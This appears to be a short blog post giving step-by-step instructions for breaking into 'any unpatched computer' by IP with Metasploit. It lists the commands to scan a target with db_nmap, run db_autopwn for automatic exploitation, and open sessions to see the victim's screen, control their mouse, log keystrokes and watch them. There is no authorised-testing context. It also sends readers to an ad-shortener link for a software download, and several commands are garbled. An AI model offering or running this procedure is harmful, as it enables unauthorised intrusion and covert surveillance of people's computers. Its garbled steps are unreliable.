Hack any computer with an ip (MetaSploit)
I am here to show you this magical tool called metasploit that allows you to hack anyunpatched computer with only its IP .Lets begin
1) First you need to download metaSploit . The most up-to-date version is free at metasploit.com
2) you need Postgrsql for your database . Download from this link,
http://adf.ly/Fg7U2
Make sure you use all the defaults or metasploit woun't work!
3) now lets go down to business... After installing both tools, open up the PostgrSQL admin gui (start -> all
programs -> PostgreSQL 9.0 -> pgadmin III). then right-click on your server (in the left hand box) and click connect . Remember to keep this window open the whole time. you will also need the pass you chose to use in step 5...
4) time for some hacking! Go to start -> all programs -> Metasploit framework , and then open the metasploit gui. Let it load untill it look like this:
5) Now , in the window type:
db_connect postgres: ThePassyouChose@localhost : 5432
The first time you do this you will see lots of text flash buy. Don't wory. this is normal.
6) Type db_host to make sure you are connect correctallly.
7) Now type this:
db_nmap 000.000.000.000
Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...
8) Now we get to the fun part; the automatic exploitation , Just type db_autopwn -t -p -e -s -b , watch the auto-exploitation start, go play halo for a while, andthen come back...
9) After th exploitation is done, type sessions -1 to see what the scanner found. If all went, you should see a list of exploits.
10) Now we get to use the exploits to hack the computer!!! if you will notice, all of the exploits are numbered , and they all have obvious names (i.e. , reverseScreen_tcp). In order to use an exploit , type this:
sessions-i ExploitNumber
The features of Metasploit are much like a rat. once you get into someone's computer , you can see their screen, controll their mouse, see what they type , see them, etc,,,,,,
No comments:
Post a Comment